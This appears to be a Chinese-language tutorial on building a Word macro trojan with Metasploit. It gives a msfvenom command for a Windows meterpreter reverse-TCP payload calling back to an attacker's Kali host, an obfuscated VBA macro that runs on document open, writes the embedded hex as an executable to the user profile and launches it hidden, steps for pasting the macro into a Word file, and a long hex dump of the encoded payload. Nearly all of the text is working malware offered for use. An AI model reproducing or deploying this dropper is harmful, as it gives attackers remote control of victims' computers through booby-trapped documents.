通过msf制作简单木马
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=Kali的IP LPORT=Kali监听的端口 -e x86/shikata_ga_nai -i 10 -f vba-exe
1)代码部分
Sub Auto_Open() Mxvpx12 End Sub Sub Mxvpx12() Dim Mxvpx7 As Integer Dim Mxvpx1 As String Dim Mxvpx2 As String Dim Mxvpx3 As Integer Dim Mxvpx4 As Paragraph Dim Mxvpx8 As Integer Dim Mxvpx9 As Boolean Dim Mxvpx5 As Integer Dim Mxvpx11 As String Dim Mxvpx6 As Byte Dim Cymkvnpffx as String Cymkvnpffx = "Cymkvnpffx" Mxvpx1 = "FNYuyWpBF.exe" Mxvpx2 = Environ("USERPROFILE") ChDrive (Mxvpx2) ChDir (Mxvpx2) Mxvpx3 = FreeFile() Open Mxvpx1 For Binary As Mxvpx3 For Each Mxvpx4 in ActiveDocument.Paragraphs DoEvents Mxvpx11 = Mxvpx4.Range.Text If (Mxvpx9 = True) Then Mxvpx8 = 1 While (Mxvpx8 < Len(Mxvpx11)) Mxvpx6 = Mid(Mxvpx11,Mxvpx8,4) Put #Mxvpx3, , Mxvpx6 Mxvpx8 = Mxvpx8 + 4 Wend ElseIf (InStr(1,Mxvpx11,Cymkvnpffx) > 0 And Len(Mxvpx11) > 0) Then Mxvpx9 = True End If Next Close #Mxvpx3 Mxvpx13(Mxvpx1) End Sub Sub Mxvpx13(Mxvpx10 As String) Dim Mxvpx7 As Integer Dim Mxvpx2 As String Mxvpx2 = Environ("USERPROFILE") ChDrive (Mxvpx2) ChDir (Mxvpx2) Mxvpx7 = Shell(Mxvpx10, vbHide) End Sub Sub AutoOpen() Auto_Open End Sub Sub Workbook_Open() Auto_Open End Sub
将此段复制到Word文档——>视图——>宏——>输入宏名称——>宏的位置选择要创建的宏病毒文档——>创建——>粘贴并保存
2)数据部分
Cymkvnpffx &H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H80&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H50&H45&H00&H00&H4C&H01&H03&H00&H60&HD4&HA5&H0D&H00&H00&H00&H00&H00&H00&H00&H00&HE0&H00&H0F&H03&H0B&H01&H02&H38&H00&H02&H00&H00&H00&H0E&H00&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H10&H00&H00&H00&H20&H00&H00&H00&H00&H40&H00&H00&H10&H00&H00&H00&H02&H00&H00&H04&H00&H00&H00&H01&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H02&H00&H00&H46&H3A&H00&H00&H02&H00&H00&H00&H00&H00&H20&H00&H00&H10&H00&H00&H00&H00&H10&H00&H00&H10&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H30&H00&H00&H64&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2E&H74&H65&H78&H74&H00&H00&H00&H28&H00&H00&H00&H00&H10&H00&H00&H00&H02&H00&H00&H00&H02&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&H60&H2E&H64&H61&H74&H61&H00&H00&H00&H90&H0A&H00&H00&H00&H20&H00&H00&H00&H0C&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&HE0&H2E&H69&H64&H61&H74&H61&H00&H00&H64&H00&H00&H00&H00&H30&H00&H00&H00&H02&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H30&HC0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HB8&H00&H20&H40&H00&HFF&HE0&H90&HFF&H25&H38&H30&H40&H00&H90&H90&H00&H00&H00&H00&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HDA&HD7&HB8&H66&HD7&H9A&H26&HD9&H74&H24&HF4&H5E&H2B&HC9&H66&HB9&H04&H02&H83&HEE&HFC&H31&H46&H16&H03&H46&H70&H35&H6F&H17&HBC&HD1&H98&H48&H7C&H22&HFD&H97&H4C&H46&H74&H47&H77&H52&H3B&H36&H1E&H75&HCF&H9E&H54&HAE&H3B&H7E&HBF&H67&H72&HEC&H8E&H19&H62&H90&H1E&H19&H8F&H46&H54&H2E&HEE&H90&H15&H66&HFA&H7F&H6F&H2D&H5F&H62&HF6&H3D&HA4&HA3&H9C&H77&HD3&H82&H7D&HC5&H45&H1C&H84&H93&H39&H3C&H5E&H44&HFE&HDF&HC1&HCD&HD1&HB3&H5C&H47&H2E&H84&HE8&H6E&H33&H03&HF5&HAF&H64&HCB&H8A&HEA&HF1&H47&H29&H6A&H0E&HE2&HD5&H76&H45&H50&H0F&HD1&HD0&H77&HCD&HBA&H96&H8B&HF1&H1D&H7E&HFA&H92&H8F&H34&H4D&H2A&HAD&H16&H7A&H09&HC2&HB0&H08&HB3&H23&H0C&HB9&H05&H74&HAB&HBF&HE3&H44&HCA&H55&H19&HEE&H6A&H34&H86&H6A&H76&H37&HA5&H47&HF1&H4A&H57&H28&H42&H15&H30&H44&H73&H06&H6C&H57&HBF&H36&H20&H6F&HAB&H32&HAB&HCE&HAA&H82&H2C&HA2&H3C&H07&HBB&HD1&HDC&HF4&HDE&H65&HF3&H5B&HA1&H62&HAC&H43&HCE&H75&H61&H56&H83&HA8&HA1&HBA&H76&H7E&H8C&HBD&H33&H2D&HA1&HA8&HD5&H9F&H66&HD0&H7F&HF6&H8E&H05&HAB&H22&HDA&H08&HF7&H29&H37&H03&H13&H2A&HB8&HA5&H6C&H7B&HD7&HD3&H53&H4B&H34&H49&HBD&H75&HF0&HC0&H3A&H06&H8F&HA6&HC7&HCE&H16&HB5&H17&H3A&H89&H18&HC4&HEE&HE5&H60&H6C&H29&H43&H1F&H86&H24&HAF&H6A&H98&H89&HC7&H0E&HC7&H31&HE7&H74&H34&H31&H34&H95&H82&H19&HAC&H4E&H12&H44&HCB&HEE&HB0&H34&H1E&H70&HA3&H7F&H46&HEB&HA9&HB5&HB2&H55&HBF&HA0&H89&H48&H5E&H36&H83&H68&H3B&HCA&HB3&HC8&H23&H10&HBA&HB2&HDC&H1E&H4F&H2B&H63&H72&H9D&HF2&H6A&HB0&H8E&H98&HED&H17&H9B&H24&H53&H87&H51&HC0&H23&HC0&H60&HFD&HC1&HEA&H1E&HEF&HB5&HB5&H51&H49&H72&H03&H18&H84&H8F&H23&HDD&H25&HCE&HA3&HF2&H94&H59&HA8&H8B&H30&H5D&HFB&H7A&H3F&H41&H64&HCD&HEA&HCD&H6B&H2A&H8D&H23&H1A&HFC&H8C&HA3&H19&HAE&H12&H01&HAE&HC0&H36&H5D&H75&H47&H8B&H7C&HC0&H28&HED&H6F&H7F&HE6&H5C&H1A&HD0&H36&H10&HCD&H91&H8A&H59&HF9&H18&H7B&H48&H77&HED&H06&H7E&HA1&H89&H7C&HE0&H6F&H4A&H57&HD1&H7A&H33&H1E&HD8&H95&HCA&HD1&HCB&H32&H75&H2D&HFD&HA4&H01&H5A&H19&H43&HB0&H9F&H01&H06&H64&H54&H6D&HB4&H9E&H47&HE7&HB2&H4D&HE3&HC5&H28&H16&H45&H9F&H1B&HBC&HC9&HD3&HDC&H6D&HCA&H37&H67&H5C&HB5&H26&H4F&HD5&HD6&H53&HA2&H42&HBA&H19&H95&HA7&HB0&HF5&H08&HB3&H38&HA0&H4A&H0F&H0A&H9D&HCB&HA9&H82&H44&HB2&H96&H49&HAC&H49&H8C&HA7&H9B&HF6&H38&H49&HD5&HE0&HB6&HE9&H46&HEC&HAA&HE9&H35&H46&H09&H29&HB1&HEB&HCE&HA6&H82&H88&H4C&H47&H1B&H46&H26&H64&HE8&HD9&HFD&H2E&H26&H8D&H7C&H0E&H9F&HC0&HE9&HB4&HA2&H62&HA6&H56&HF6&H7C&H91&HE6&HA7&H6A&H8A&H85&HE0&H1A&HD9&HBB&H9D&H9B&H63&H2E&H16&HA5&H97&H5F&H97&H68&HD0&H61&HAD&H32&H7C&H1B&H52&HD8&HAD&H0D&H7C&H35&H57&H97&H7F&H14&H26&HCA&HBC&HDB&H0E&H6D&H9B&H9E&H7C&H7A&H7D&H4D&H4C&H20&HFD&HA0&H4C&H42&HEA&H9A&HF9&HFF&H26&H31&H18&H72&HFB&HAC&H06&H36&H42&HAE&H09&H1C&HB2&H90&H4B&H47&H2B&HF6&H6C&HAB&H93&H21&H49&HFD&H0B&H2C&HF3&HC3&H42&H0C&HE4&H07&H31&H60&H96&HCD&H15&H41&H84&HDD&H14&H86&H20&HCC&H0C&H0E&H61&HC5&H2C&H87&HC2&H28&H34&HFC&HAE&H10&H5C&H8C&H99&H05&H4F&HB9&H40&H32&HA4&HD5&H00&H36&H40&H6C&H44&H1A&H55&HF8&H5F&HBB&HB1&HDC&H0E&H7E&HAB&HB1&H43&H6D&HC4&HD2&HB5&H04&H4E&H73&H43&HAA&H39&HE8&HE3&H86&H12&H3E&H04&HC7&HEB&HB2&H45&H3C&H9C&H8D&H3C&H6C&H45&HD1&HC3&HED&H3C&H99&H04&H81&H1B&HA4&H85&H89&H73&HDB&HBB&HB7&H76&H82&HD1&H14&HDC&H9B&H19&HA2&HF0&H1E&HF9&H37&H9C&H4B&HA1&HB0&HE0&H2C&HE6&HF9&HCC&HAE&H68&H79&HC1&HF6&HFF&H28&HC3&H4E&HC2&H3D&HE3&H91&HE1&HF7&H23&H16&HF1&H36&H67&H3A&H45&H95&H33&H5E&HF8&H43&HC6&H04&H62&H5D&H81&HD6&H40&H00&H59&H5D&H7A&HD7&HF9&HEA&H65&HDC&HD7&H40&H63&HC1&HF1&HD0&H76&H3B&H07&H3E&HBB&HCD&H6A&H36&HE3&HB8&H5B&H5B&HDA&H68&HE3&H91&HA8&H42&HBC&H1E&HE6&H6B&HC2&H71&H8D&HE4&HA7&HE6&H92&H0D&HB3&HA8&H84&H66&H65&H1E&H59&HBE&H95&HBC&HFF&HDB&HBA&H19&H18&HAE&HC2&H6E&H6D&HB4&H65&HA6&H7A&H24&HD6&H11&HA8&H68&HF6&H93&H08&H9B&HD4&H16&H75&HE5&H2F&H41&HD8&HFD&H3B&H87&H9F&HF1&HCC&H91&HDA&HBA&H73&H54&HFB&HE3&HC8&HE8&HCC&H54&H8D&H66&H6C&HEC&H1F&HBE&H27&H38&HB3&H06&H56&HB9&HBE&HFF&H77&H9E&HCF&H65&HF0&H64&H91&H4D&H6D&H49&HB5&H6D&H83&H9C&H39&HE8&H73&H32&H94&H01&HE6&H2F&HDF&HC8&H8C&H00&H44&H83&H9E&H21&HA6&H2A&HD3&HC3&HED&H63&H49&H75&H09&H19&H0F&HE8&HBD&H68&HB9&H07&H2B&H04&H01&H43&HDC&HB4&HC7&H11&H0C&H10&HFB&H04&H67&HC1&HE9&H69 &HB0&H5A&H36&H9E&H44&H5A&HCB&H34&HC7&H13&HF9&H8C&H86&HC3&H2E&H2D&HA0&H5D&H59&H06&H17&HAD&H0E&HC1&HC7&H73&H6C&HE7&HCE&HD6&H7D&H93&HEE&H14&H36&HD7&H87&H76&H34&HAD&HFE&HD4&H46&H84&HA4&H93&H9C&HF9&H4A&HD8&H8B&H82&H23&HFD&H29&H13&H2D&H5B&H64&H3F&H2C&H42&H09&H51&HBE&H54&H2D&H52&H5E&H54&H30&HAD&HB0&H90&HBA&H43&H32&H31&H65&HCE&H5C&HBD&HBA&H4F&H35&H91&H95&H58&HEA&HE1&HB9&H64&H63&HE1&H5D&H22&HF7&H09&H37&H3E&H0A&H9B&H40&HFD&H9D&HC0&HDC&HBE&H01&HEE&HAE&HF5&H39&H54&HAC&HFF&H17&H9F&HD7&H62&H65&H70&HD8&H5C&HAF&H32&H8E&HFD&HB8&HD5&HA2&H6B&HAC&H79&H54&H0B&H4C&HE0&H6F&H09&HA5&H06&H63&H39&H5A&H0C&H04&H2A&H00&H85&HCC&H7C&HF7&H3D&H09&H2F&H22&H27&HC5&H2C&H8A&H58&H45&HE9&H18&H1A&H2B&H51&H2E&HD1&H16&HC9&HD3&HC2&H80&H0A&H7A&H97&H39&H8C&HE1&H1E&H87&H9C&HFF&HD2&HD0&HA9&H47&HA9&H01&HD6&H26&H3B&H4E&HD9&H25&H3F&H25&H46&HE0&HE7&H6F&HD3&H63&HCB&H15&H5E&H60&H70&HE8&H7F&H63&HFD&HB3&HDA&H0E&H1D&HAC&HEA&H71&H0F&HD5&H2A&HEF&H01&HE0&HBF&HB1&HFD&H31&H8C&H56&H2E&H35&H87&HC3&H07&HB9&H56&H60&HE5&H71&HF8&HE3&H93&H13&H3C&H35&H86&H7B&H8B&H4F&H49&H5E&H15&HCF&H53&H74&HA5&HB4&HDF&H4C&H7F&H60&H7D&H34&H1E&HE0&H33&H6C&H37&HD7&H25&H52&H4F&H1D&H2A&H69&H0E&HFD&H95&H9A&HC1&HB9&HA2&H5F&H68&HF5&H22&H0B&H67&HC7&H90&H34&HA2&HA8&HFA&HC8&HA8&HCE&H0D&H2D&HDF&H84&H15&H2E&HFB&HA9&H8E&HFF&HE5&H77&HF1&HA1&HBF&H97&HDC&HD1&H1C&H0C&H1B&H61&H84&H44&HBA&H42&HEE&H6B&HD6&H1C&H01&HB2&H3D&H60&HF8&H74&H32&H08&HDD&HEC&H6A&HD4&H65&HF7&H4A&H4B&HBD&HD6&H4D&H3A&HF1&H8E&H5E&H0B&H3B&H42&H36&HD4&HF2&HF8&H35&H31&H05&H63&H06&H2E&HD9&H11&HF0&H87&H8F&HFC&H40&H83&H24&H74&H8B&H40&HA2&HD5&H78&H4F&H5D&H25&HD7&H7E&H74&HC2&HA6&H1F&H30&HE6&H4B&H3E&HFF&HAA&H1F&HCB&HB3&H4E&H99&H3E&H3C&H0F&H40&HC6&H3B&HBB&H38&HC6&H64&H00&HF4&H40&HAC&H70&H04&HDB&HE9&HA9&H0F&HC9&H2B&HBD&HE4&H52&HD7&HE2&H61&HDD&H40&H74&H96&HCA&HC0&HAF&HBA&H73&H28&HE4&H66&H10&H44&H4C&H44&H78&H75&HC2&H09&H10&H6F&HFC&H0B&H1B&H3A&H52&H9C&H5F&H8A&H0A&H27&H05&HBF&HC2&H5E&HF5&HAB&H24&HBB&H14&HFD&HB5&HA6&H78&H89&H50&H4C&H57&H55&H4C&HC1&H61&H5D&H52&H2F&H8D&HFE&H96&HE3&HA4&HDF&H76&HBF&H64&H16&H68&HEF&H59&H51&H24&HEB&HA2&H3D&H64&H79&H45&H34&H0E&HE9&H41&HFC&HE0&H3C&HBA&H29&H03&H8F&H97&HB4&H69&H5E&H91&H5B&H03&HAD&H95&H9D&H05&H89&H97&H36&HDD&H38&H55&H2D&HB1&H3F&HC3&H77&H1F&HD2&H90&HC5&H3E&H90&H03&H54&H08&H0B&H17&HC9&HF9&H13&HAE&H73&H86&H37&H8D&H86&H19&HFB&H7D&HA5&H8F&H03&H7D&H1F&HD1&H48&HFA&H93&HA8&HDB&H34&HEB&H16&H1D&HBC&H68&H5C&HA5&H56&H68&H79&HCC&H36&HD5&H7A&H56&H15&H45&HB6&HE7&H4E&H79&HEA&HB7&H7C&H6C&HD7&H38&HD4&H7F&H0C&HAF&HD1&H97&HBE&HA2&H1B&H67&HAF&H5A&HCD&H8C&HA3&HDE&HCE&HB4&H39&HFF&H89&HD2&H34&H47&H33&H47&HA3&HAF&H35&HD8&HE3&HEE&HA9&H72&H8B&HA8&HE7&H8D&H69&H0D&H28&HC4&H94&H81&H33&H45&HCC&H3C&HF3&HA7&HE2&H50&H87&H7F&H4E&HFE&H74&H9B&H64&HC9&H73&H9D&HE3&HB6&H82&H0C&H79&H93&H67&H6B&HBF&HB4&HBF&H41&HD1&HFD&HFF&HB6&H07&H21&H4E&H8E&HB4&H4D&HE1&HA4&H2E&H65&H7E&H92&H30&HF2&H4C&H7A&H0E&HE2&HDB&H2E&H50&H69&HDF&H58&H23&H10&H0C&H02&H72&H28&H07&HA9&H35&H8D&HAA&H9F&H6D&H3C&HF7&HB8&HDE&H24&H00&HD6&HC1&H3F&H7E&HFA&H5D&H7D&HDA&HC7&HF3&H5E&HCC&HC2&H60&HAC&HAE&H3F&HD9&H7E&HD8&HD7&H6A&HBB&H55&H84&HCB&H89&H98&HC8&H31&H73&H28&H39&H3F&H7F&HE0&HE0&H30&H58&H28&H20&H7F&HE7&H3A&HD2&H16&H78&HFD&H0C&H27&H61&H32&H91&H7F&HC6&HC4&H0D&HD8&HD6&H1E&HA9&HD2&HDF&HFA&HA2&H28&HA8&H24&HD9&H6D&HE7&H2E&H7D&HD7&H77&H9F&HAA&H5B&HB3&H16&H41&HCC&H53&H09&H0B&HE0&H0E&HF9&H19&HAF&HF7&H0E&HDB&HBF&HAD&H9E&H1A&HAB&HC1&H5B&H44&H83&HC2&H67&H60&H41&H4A&HAF&H1A&HCD&H25&HE9&H59&HE7&H75&H1F&HBD&H43&H71&H3F&H6A&HC9&H6A&HBD&HE7&H41&HE3&H25&HC6&H8B&H52&H37&H27&H4E&H27&HF9&H1F&HA3&H21&H72&H38&H5A&H3C&H20&HCA&H07&H33&H73&H14&HF0&H8B&HC8&H8E&HCE&HFC&HA1&HB9&H93&H55&H1E&H5C&HF5&H11&HC5&H9E&HE0&H74&H9D&H4B&H9A&H94&H5D&H79&HBB&HED&H07&HE9&H40&H6E&H19&H95&HAA&HD0&H7A&H45&H6E&H99&H7C&H49&H44&H71&HF2&H91&HBC&HB1&H0F&H60&H5D&HD2&H07&H86&HD2&H70&HC6&H58&HC3&H97&HEF&H46&HEE&HA4&HDD&HB0&HC4&H72&H25&HA9&HEC&HFE&HA3&H6C&HE3&HDF&H08&H90&HA4&H58&HF8&H37&H85&H29&HCF&H13&HBD&HC6&H8F&H00&HAA&HA9&H74&HF8&HE0&H55&HE2&H06&HEF&H5A&HEF&H7C&H54&HBE&H2C&HAD&H86&H7E&H6E&H75&H61&H60&H76&H1B&HD9&H84&HC7&H7C&HA9&HDC&HE3&H58&HA5&H8F&H0D&H10&H7F&H87&HEF&H72&H38&HC8&H71&HC2&HCA&H23&HBB&H86&H59&H4C&H36&HD1&HF3&H7B&H8A&H4F&H01&H15&HFC&HA7&HAE&HF5&H76&H54&HF9&HAD&H26&H90&H45&H31&H53&H95&H85&H04&H55&H8B&H03&HD4&H82&H3B&HF1&H48&H00&H2E&HDC&H2E&HEE&HC8&H14&H43&H2F&H18&H5A&HE6&HCB&HD1&H5D&HF8&H63&HEE&H48&H94&H63&H5C&HFB&HA8&H9B&HFC&H81&HE4&HE2&HCC&HFC&H41&HAD&HAD&HA7&HA2&H19&HFA&H50&H94&H0E&HCB&HDF&H31&HA8&H1B&HFF&H66&H53&HA6&H72&HC1&HE8&H81&HA7&H7B&H38&H23&H8B&HE5&H64&H7F&H7D&H3D&HC7&H9F&HB8&H37&H48&H37&HB9&H19&HF7&H68&H5E&H81&H06&HC8&HE6&HC6&H8D&HA7&H92&H76&HAF&H44&HBD&HC8&H6C&HB5&HE6&H89&HF3&HEE&HCC&H53&HE7&HE0&H5C&HB6&HBB&H81&HEE&H8A&H7A&HBC&H88&HE2&HB3&H28&H00&H27&H47&HA4&H09&H47&HEE&HE4&H1F&H44&H77&HD9&HFB&H56&H18&HC1&HB1&HDF&H43&HF8&HFD&H03&HEC&HAD&H71&H24&H8D&H07&HB3&H4D&HB8&H1C&HF8&H9D&H29&H1F&H73&HCB&H0E&H91&H9B&HF4&H15&H5F&HEB&H46&HA1&HC3&H8B&HC0&HB2&H33&H62&HC1&HFF&H8A&H5D&HD3&H59&H58&H92&HDC&H1D&H80&HFD&HCB&H3A&H7F&HD6&H94&HDB&H82&HDA&H0F&H91&HAA&H12&H35&HD9&H52&H9F&H20&HB4&H2A&H5E&HEB&HE0&HD5&H38&H19&H4A&H70&H38&HAD&HF3&H88&HA7&HA4&H9B&H84&H01&H4B&HFD&H07&HDE&HA1&HB6&H0C&H10&HAC&HA9&H5D&HC8&HFF&H18&H08&H02&HDE&H48&H86&H9E&HBA&HA2&HF7&H96&H4F&H24&HD4&H1D&HF1&H6F&H2C&HA2&HAA&HFD&HF7&HC1&H6E&HB1&HC6&HFE&HAB&H3A&H62&HD4&H0F&H41&H83&H83&HA1&H33&H46&H42&H28&H7C&HEA&H6D&H4F&H67&HE8&HC5&HF3&HA3&HFB&H28&H32&H43&H73&H31&H51&H11&H64&H19&H29&H5B&H55&HC4&H1A&H13&H70&HBE&HFC&H5C&H14&H64&HCB&H54&H66&H5B&HF8&H48&HC6&H6F&H30&H0D&H84&H27&HE5&H2F&HCD&H62&H57&HFC&H68&H55&HF3&HEB&H4D&HCF&H78&HC4&H51&HC8&H0C&H1B&H9B&HC8&H14&H3D&H10&HFD&H68&HB4&H39&H3E&HC1&H46&H41&HE4&H7E&HC4&H7B&H67&H9B&H5C&H75&H24&H59&H3D&H8C&H31&H11&HD1&H24&HC9&H52&H6A&H50&H6F&H25&H9F&H0C&H13&HFC&HBA&H8D&HCA&H12&H1B&H5F&H0F&HC8&H22&H60&HC3&HA5&H53&HFF&H9F&H4E&HC4&H8D&H43&H08&H05&H38&HA1&H77&H6C&H4C&H6D&H46&H94&HAE&HFB&HDB&HC9&H94&H00&HDC&H95&HA8&H70&H23&H62&HAC&H95&H46&HA0&HD1&HBD&H44&HE1&H0D&H86&H8E&HBF&HC1&H1F&HEF&HA0&H4D&HA4&HBD&H56&HE0&H62&HDA&H78&H5E&H50&HCE&H22&H49&HE5&HFC&H84&H5E&H70&HA0&HF4&H49&HFD&H40&H58&H50&HA7&HD8&H87&H3B&H52&H7B&H07&H9E&H95&HC6&H97&H85&H12&HE7&H62&H36&H26&H3D&HCE&H39&H0C&H81&HF7&H02&H94&H62&H79&H31&HBC&H53&H05&HD6&HC3&H81&H56&H38&H06&H2C&HE4&HD1&H66&H4D&H5F&HE8&HD4&H1F&H67&H55&H90&HED&HF6&H02&HF4&H4F&H43&H8D&H75&H32&HEB&H3D&H63&H40&H9F&HEE&HBE&H5F&HEE&H05&H06&H83&HBF&HCD&H51&H3A&HA0&H98&HA9&H97&HE2&HFE&HB4&HAD&H29&HBA&HF2&H01&HD3&HCA&HB1&HB3&HB2&H1B&H5B&H5B&H81&H81&HE3&HD9&HE8&H93&H4E&HD3&HB6&H64&HB5&HAD&H61&H78&H30&H19&HC0&HE0&H1E&HAE&H01&H3B&HA6&HAE&H93&H93&H6B&H14&H1C&H2D&H04&H71&H22&H68&H19&H8E&H00&HED&HBA&HA1&H5D&HBE&H8C&H92&H4C&H51&HD9&HC4&H8C&H03&H60&H92&HCA&H7D&H61&H53&H2E&HC3&HDB&H7F&HA7&HCE&H63&HC8&H2C&H8A&H01&H37&H23&H92&HEB&H43&H77&HDD&HC3&H08&HB9&H35&H34&H14&H1E&H85&HFC&H7D&HBC&HC7&HAB&HCF&HE2&H9E&HD6&HF2&H89&H8A&HC3&HB1&H94&HAA&HAA&HA6&H28&HC4&HDD&H67&H11&H5D&HDA&H00&H41&H28&H1D&H8A&H9E&H4E&HC5&HB8&H0F&HD1&HC8&HBF&H58&H87&HBC&H35&HAF&H21&H5C&HF0&H4B&H44&HFF&H6F&H18&H17&HB2&H63&HB3&H3B&H62&H1B&HC1&HE1&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00 